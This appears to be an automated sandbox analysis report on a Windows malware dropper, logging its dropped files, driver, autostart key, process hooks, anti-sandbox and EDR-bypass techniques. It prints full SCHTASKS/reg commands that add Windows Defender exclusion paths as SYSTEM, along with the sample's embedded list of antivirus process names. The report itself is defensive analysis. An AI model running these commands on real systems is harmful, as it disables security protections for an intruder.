Source: tbcore3U.dll.8.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.8.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.8.dr	Static PE information: section name: .mo:
Source: tbcore3U.dll.42.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.42.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.42.dr	Static PE information: section name: .mo:

Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe

Code function: 44_2_00632691 push ecx; ret

44_2_006326A4

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\2976587-987347589.08.exe	File created: C:\Users\user\Documents\vselog.dll			Jump to dropped file
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	File created: C:\Users\user\Documents\XY3LL0.exe			Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\2976587-987347589.08.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Source: C:\Users\user\Desktop\2976587-987347589.08.exe	File created: C:\Windows\System32\drivers\189atohci.sys	Jump to dropped file
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	File created: C:\Users\user\Documents\vselog.dll	Jump to dropped file
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	File created: C:\Users\user\Documents\XY3LL0.exe	Jump to dropped file
Source: C:\Users\user\Documents\XY3LL0.exe	File created: C:\Program Files (x86)\byHW9q\byHW9q.exe	Jump to dropped file
Source: C:\Users\user\Documents\XY3LL0.exe	File created: C:\Program Files (x86)\byHW9q\tbcore3U.dll	Jump to dropped file
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	File created: C:\Program Files (x86)\x736Pg9\tbcore3U.dll	Jump to dropped file
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	File created: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Jump to dropped file

Source: C:\Users\user\Desktop\2976587-987347589.08.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Key value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu			Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Key value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu			Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"

Source: C:\Program Files (x86)\byHW9q\byHW9q.exe

Registry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron

Jump to behavior

Source: C:\Users\user\Documents\XY3LL0.exe

7_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Documents\XY3LL0.exe	Memory written: PID: 892 base: 7FF9082F0008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Memory written: PID: 892 base: 7FF90818D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Memory written: PID: 4456 base: 7FF9082F0008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Memory written: PID: 4456 base: 7FF90818D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Memory written: PID: 7708 base: EE0005 value: E9 8B 2F 66 76	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Memory written: PID: 7708 base: 77542F90 value: E9 7A D0 99 89	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Memory written: PID: 7708 base: F00005 value: E9 8B 2F 64 76	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Memory written: PID: 7708 base: 77542F90 value: E9 7A D0 9B 89	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Memory written: PID: 1052 base: 1430005 value: E9 8B 2F 11 76
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Memory written: PID: 1052 base: 77542F90 value: E9 7A D0 EE 89
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Memory written: PID: 1848 base: FB0005 value: E9 8B 2F 59 76
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Memory written: PID: 1848 base: 77542F90 value: E9 7A D0 A6 89
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Memory written: PID: 7036 base: 750005 value: E9 8B 2F DF 76
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Memory written: PID: 7036 base: 77542F90 value: E9 7A D0 20 89
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Memory written: PID: 7820 base: 15C0005 value: E9 8B 2F F8 75
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Memory written: PID: 7820 base: 77542F90 value: E9 7A D0 07 8A
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Memory written: PID: 5488 base: 6B0005 value: E9 8B 2F E9 76
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Memory written: PID: 5488 base: 77542F90 value: E9 7A D0 16 89

Source: C:\Users\user\Documents\XY3LL0.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 6CBE87AA
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 6CC3183C
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 6CCA1EB4
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 6CD08092
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 6CB98B19
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 6CC3C0AF
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 6CB0DE34
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 36E4BC8
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 3B501D5
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 3745BE3
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 3758F6F
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 3AA7AA6
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 6CCD82C1
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 6CCACBDE
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 6CBF080B
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 6CCF91B6
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 6CBF2089
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	API/Special instruction interceptor: Address: 6C5C7C0E
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	API/Special instruction interceptor: Address: 6C4A87AA
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	API/Special instruction interceptor: Address: 6C55A702
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	API/Special instruction interceptor: Address: 6C45A03F
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 6CCAB056
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 6CCB9F9E
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	API/Special instruction interceptor: Address: 6C5A2F48
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	API/Special instruction interceptor: Address: 6C458B19
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	API/Special instruction interceptor: Address: 6C4B080B
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	API/Special instruction interceptor: Address: 6C5B91B6
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 6CCE6565
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 6CCF7912
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	API/Special instruction interceptor: Address: 6C4090FC
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	API/Special instruction interceptor: Address: 6C5482C1
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	API/Special instruction interceptor: Address: 6C578092
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	API/Special instruction interceptor: Address: 6C529F9E
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	API/Special instruction interceptor: Address: 6C46080B
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	API/Special instruction interceptor: Address: 6C37DE34
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	API/Special instruction interceptor: Address: 6C567912
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 6CB8F12B
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	API/Special instruction interceptor: Address: 6CC58647

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: {4E062DDA-444A-A2A8-84CE-E105F66A5AB3}SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEMCONSENTPROMPTBEHAVIORADMINSOFTWARE\PERFRPOOLSOFTWARE\PPFR49/56/235/24;9161POSTDATAC:\WINDOWS\SYSWOW64\DRIVERS\189ATOHCI.SYS360SAFE.EXE360SD.EXE360RP.EXE360RPS.EXESRAGENT.EXE360TRAY.EXEZHUDONGFANGYU.EXEKANKAN.EXESUPERKILLER.EXELIVEUPDATE360.EXEMODULEUPDATE.EXEFILESMASHER.EXEAGREEMENTVIEWER.EXESOFTMGRLITE.EXE360LEAKFIXER.EXE360SDRUN.EXE360SDUPD.EXE360FILEGUARD.EXEDEP360.EXEDUMPUPER.EXEDSMAIN.EXEDSMAIN64.EXEFIRSTAIDBOX.EXECHECKSM.EXEHIPSMAIN.EXEHIPSDAEMON.EXEHIPSTRAY.EXEHRUPDATE.EXEHIPSLOG.EXENETFLOW.EXEAUTORUNS.EXEUSYSDIAG.EXEWSCTRLSVC.EXEWSCTRL.EXEKXEMAIN.EXEKXESCORE.EXEKSCAN.EXEKXECENTER.EXEKXETRAY.EXEKDINFOMGR.EXEKISLIVE.EXEKNEWVIP.EXEKSOFTPURIFIER.EXEKTRASHAUTOCLEAN.EXEKAUTHORITYVIEW.EXETQCLIENT.EXETQEDRNAME.EXETQSAFEUI.EXETQTRAY.EXETRANTORAGENT.EXETQDEFENDER.EXETQUPDATEUI.EXETQWATERMARK.EXEDLPAPPDATA.EXENACLDIS.EXEMSMPENG.EXEMPCMDRUN.EXELDSHELPER.EXELDSSECURITY.EXELDSSECURITYAIDER.EXECOMPUTERZTRAY.EXECOMPUTERCENTER.EXEGUARDHP.EXECOMPUTERZ_CN.EXECOMPUTERZSERVICE.EXECOMPUTERZSERVICE_X64.EXEHDW_DISK_SCAN.EXECOMPUTERZMONHELPER.EXEDRVMGR.EXEWEB_HOST.EXE2345SAFECENTERSVC.EXE2345RTPROTECT.EXE2345SAFESVC.EXE2345MPCSAFE.EXE2345SAFETRAY.EXE2345SAFEUPDATE.EXE2345VIRUSSCAN.EXE2345MANUUPDATE.EXE2345ADRTPROTECT.EXE2345AUTHORITYPROTECT.EXE2345EXTSHELL.EXE2345EXTSHELL64.EXE2345FILESHRE.EXE2345LEAKFIXER.EXE2345LSPFIX.EXE2345PCSAFEBOOTASSISTANT.EXE2345RTPROTECTCENTER.EXE2345SHELLPRO.EXE2345SYSDOCTOR.EXELENOVOPCMANAGERSERVICE.EXELENOVOPCMANAGER.EXELAVSERVICE.EXELENOVOTRAY.EXELNVSVCFDN.EXEWSCTRL7.EXEWSCTRL10.EXEWSCTRL11.EXELENOVOAPPUPDATE.EXELENOVOAPPSTORE.EXEDESKTOPASSISTANTAPP.EXEDESKTOPASSISTANT.EXELENOVOMONITORMANAGER.EXELENOVOOKM.EXELEASHIVE.EXESTARTUPMANAGER.EXEWSPLUGINHOST.EXEWSPLUGINHOST64.EXECRASHPAD_HANDLER.EXESEARCHENGINE.EXELISFSERVICE.EXELSF.EXEAPPVANT.EXELENOVOINTERNETSOFTWAREFRAMEWORK.EXEEMDRIVERASSIST.EXELEAPPOM.EXEHOTFIXPLATFORM.EXEMSPCMANAGER.EXEMSPCMANAGERSERVICE.EXEAVP.EXEAVPUI.EXEAVASTSVC.EXEASWTOOLSSVC.EXEASWIDSAGENT.EXEWSC_PROXY.EXEAVASTUI.EXEAVIRA.SPOTLIGHT.SERVICE.EXEENDPOINTPROTECTION.EXESENTRYEYE.EXEAVIRA.SPOTLIGHT.COMMON.UPDATER.EXEAVIRA.SPOTLIGHT.FALLBACKUPDATER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.EXEAVIRA.SPOTLIGHT.SYSTRAY.APPLICATION.EXEAVIRA.OPTIMIZERHOST.EXEAVIRA.SPOTLIGHT.BOOTSTRAPPER.EXEAVIRA.SPOTLIGHT.SERVICE.WORKER.EXEAVIRA.SPOTLIGHT.COMMON.UPDATERTRACKER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.MESSAGING.EXEAVIRA.SPOTLIGHT.UI.ADMINISTRATIVERIGHTSPROVIDER.EXEMFEMMS.EXEMFEVTPS.EXEMCAPEXE.EXEMCSHIELD.EXEMCUICNT.EXEMFEAVSVC.EXENISSRV.EXESECURITYHEALTHSYSTRAY.EXEKWSPROTECT64.EXEQMDL.EXEQMPERSONALCENTER.EXEQQPCPATCH.EXEQQPCREALTIMESPEEDUP.EXEQQPCRTP.EXEQQPCTRAY.EXEQQREPAIR.EXEQQPCMGRUPDATE.EXEKSAFETRAY.EXEMPCOPYACCELERATOR.EXEUNTHREAT.EXEK7TSECURITY.EXEAD-WATCH.EXEPSAFESYSTRAY.EXEVSSERV.EXEREMUPD.EXERTVSCAN.EXEASHDISP.EXEAVCENTER.EXETMBMSRV.EXEKNSDTRAY.EXEV3SVC.EXEMSSECESS.EXEQUHLPSVC.EXERAVMOND.EXEKVMONXP.EXEBAIDUSAFETRAY.EXEBAIDUSD.EXEBKA.EXEBKA
Source: byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\2976587-987347589.08.exe	RDTSC instruction interceptor: First address: 1400010D3 second address: 1400010EA instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	RDTSC instruction interceptor: First address: 1400010EA second address: 1400010EA instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007F9EC5272230h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Documents\XY3LL0.exe	RDTSC instruction interceptor: First address: 61C6A5 second address: 61C6B3 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc

Source: C:\Users\user\Desktop\2976587-987347589.08.exe

Dropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sys

Jump to dropped file

Source: C:\Users\user\Documents\XY3LL0.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_7-14095
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_44-3227

Source: C:\Users\user\Documents\XY3LL0.exe

API coverage: 2.7 %

Source: C:\Users\user\Documents\XY3LL0.exe TID: 1688	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe TID: 5544	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe TID: 7012	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe TID: 5460	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe TID: 7804	Thread sleep count: 62 > 30	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe TID: 7804	Thread sleep time: -31000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe TID: 2068	Thread sleep count: 45 > 30	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe TID: 5460	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Documents\XY3LL0.exe	Last function: Thread delayed
Source: C:\Users\user\Documents\XY3LL0.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\XY3LL0.exe

Code function: 7_2_00007FF8FDF9A1B8 FindFirstFileExW,

7_2_00007FF8FDF9A1B8

Source: C:\Users\user\Documents\XY3LL0.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Users\user\Documents\XY3LL0.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	File opened: C:\Users\user	Jump to behavior

Source: 2976587-987347589.08.exe, 00000000.00000003.1811326740.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1872724814.0000000000E36000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: byHW9q.exe, 0000002A.00000002.3239456656.0000000000D36000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Documents\XY3LL0.exe	API call chain: ExitProcess graph end node			graph_7-14096
Source: C:\Users\user\Documents\XY3LL0.exe	API call chain: ExitProcess graph end node			graph_7-14439

Source: C:\Users\user\Desktop\2976587-987347589.08.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Documents\XY3LL0.exe

Code function: 7_2_00000001400073E0 LdrLoadDll,

7_2_00000001400073E0

Source: C:\Users\user\Documents\XY3LL0.exe

Code function: 7_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

7_2_0000000140007C91

Source: C:\Users\user\Documents\XY3LL0.exe

Code function: 7_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_000000014000F000

Source: C:\Users\user\Documents\XY3LL0.exe

Code function: 7_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,

7_2_0000000140004630

Source: C:\Users\user\Documents\XY3LL0.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0000000140007C91
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00000001400106B0
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_00000001400092E0 SetUnhandledExceptionFilter,	7_2_00000001400092E0
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_00007FF8FDF91F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00007FF8FDF91F50
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_00007FF8FDF92630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF8FDF92630
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_00007FF8FDF976E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF8FDF976E0
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Code function: 44_2_00632AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	44_2_00632AE2
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Code function: 44_2_006310CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	44_2_006310CC
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Code function: 44_2_006351FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_006351FB

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Documents\XY3LL0.exe	NtAllocateVirtualMemory: Indirect: 0x140006FD0	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	NtProtectVirtualMemory: Indirect: 0x2A6B253	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	NtDelayExecution: Indirect: 0x1B94DA	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	NtProtectVirtualMemory: Indirect: 0x2ADB253	Jump to behavior

Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Program Files (x86)\byHW9q\byHW9q.exe "C:\Program Files (x86)\byHW9q\byHW9q.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
